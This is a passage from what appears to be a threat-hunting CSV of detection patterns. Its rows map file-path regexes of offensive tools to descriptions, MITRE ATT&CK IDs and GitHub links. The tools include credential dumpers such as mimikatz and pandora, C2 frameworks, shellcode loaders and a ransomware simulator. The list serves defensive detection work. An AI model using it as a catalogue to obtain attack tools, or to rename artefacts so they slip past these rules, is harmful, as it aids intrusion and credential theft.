to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*\injector.ps1 2 *",".{0,1000}\\injector\.ps1\s2\s.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*\inline-shellcode-test.c*",".{0,1000}\\inline\-shellcode\-test\.c.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*\install_elevated.py*",".{0,1000}\\install_elevated\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\interesting-teamsmessages.csv*",".{0,1000}\\interesting\-teamsmessages\.csv.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*\Inveigh.exe*",".{0,1000}\\Inveigh\.exe.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*\Inveigh.exe*",".{0,1000}\\Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\inveigh.exe*",".{0,1000}\\inveigh\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\Inveigh.ps1*",".{0,1000}\\Inveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Inveigh\bin\*",".{0,1000}\\Inveigh\\bin\\.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*\InventoryApplicationFile\revsocks_windows*",".{0,1000}\\InventoryApplicationFile\\revsocks_windows.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*\Invoke-ADSBackdoor.ps1*",".{0,1000}\\Invoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-Bypass.ps1*",".{0,1000}\\Invoke\-Bypass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Invoke-DCOM.ps1*",".{0,1000}\\Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\\Invoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-Dump.ps1*",".{0,1000}\\Invoke\-Dump\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Invoke-ExcelMacroPivot.ps1*",".{0,1000}\\Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-InternalMonologue.ps1*",".{0,1000}\\Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-Mimikatz.ps1*",".{0,1000}\\Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-mimikittenz.ps1*",".{0,1000}\\Invoke\-mimikittenz\.ps1.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\Invoke-PowerThIEf.ps1*",".{0,1000}\\Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Invoke-Stealth.ps1*",".{0,1000}\\Invoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*\InvokeWebRequestCommand.cs",".{0,1000}\\InvokeWebRequestCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Invoke-WMILM.ps1*",".{0,1000}\\Invoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\InvokeWmiMethodCommand.cs",".{0,1000}\\InvokeWmiMethodCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\iodine-*-windows.zip*",".{0,1000}\\iodine\-.{0,1000}\-windows\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*\iodine.exe*",".{0,1000}\\iodine\.exe.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*\iodine-master\*",".{0,1000}\\iodine\-master\\.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*\IOXIDResolver.py*",".{0,1000}\\IOXIDResolver\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\IPfuscation.cpp*",".{0,1000}\\IPfuscation\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\IPfuscation.exe*",".{0,1000}\\IPfuscation\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\ironvest\getCredsironvest.h*",".{0,1000}\\ironvest\\getCredsironvest\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\irs.exe*",".{0,1000}\\irs\.exe.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*\itsdangerous.zip*",".{0,1000}\\itsdangerous\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\Ivy\Cryptor*",".{0,1000}\\Ivy\\Cryptor.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*\Ivy\Loader\*",".{0,1000}\\Ivy\\Loader\\.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*\Jasmin Decryptor\*",".{0,1000}\\Jasmin\sDecryptor\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\Jasmin Decryptor\*",".{0,1000}\\Jasmin\sDecryptor\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\Jasmin Ransomware Final\*",".{0,1000}\\Jasmin\sRansomware\sFinal\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\Jormungand.sln*",".{0,1000}\\Jormungand\.sln.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*\JuicyPotato.pdb*",".{0,1000}\\JuicyPotato\.pdb.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\JuicyPotatoNG*",".{0,1000}\\JuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*\JunctionFolder.csproj*",".{0,1000}\\JunctionFolder\.csproj.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\kali-install.sh*",".{0,1000}\\kali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*\kali-linux-2023*",".{0,1000}\\kali\-linux\-2023.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\kaspersky\getCredsKasperskyEntries.h*",".{0,1000}\\kaspersky\\getCredsKasperskyEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\KAssembly.x64.o*",".{0,1000}\\KAssembly\.x64\.o.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\katz.ps1*",".{0,1000}\\katz\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz powershell alternative name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*\KaynInject.h*",".{0,1000}\\KaynInject\.h.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*\KaynLdr\KaynInject\*",".{0,1000}\\KaynLdr\\KaynInject\\.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*\KaynLdr-main\*",".{0,1000}\\KaynLdr\-main\\.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*\KaynStrike.cna*",".{0,1000}\\KaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\KaynStrike\src\*",".{0,1000}\\KaynStrike\\src\\.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\KaynStrike-main*",".{0,1000}\\KaynStrike\-main.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\KCMTicketFormatter*",".{0,1000}\\KCMTicketFormatter.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","N/A","7","1","36","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z" "*\kdstab.exe*",".{0,1000}\\kdstab\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*\keepass_discover.py*",".{0,1000}\\keepass_discover\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\keepass_trigger.py*",".{0,1000}\\keepass_trigger\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\keeper\getCredskeeper1.h*",".{0,1000}\\keeper\\getCredskeeper1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\keeper\getCredskeeper2.h*",".{0,1000}\\keeper\\getCredskeeper2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\keeper\getCredskeeper3.h*",".{0,1000}\\keeper\\getCredskeeper3\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\KeePwn.py*",".{0,1000}\\KeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential 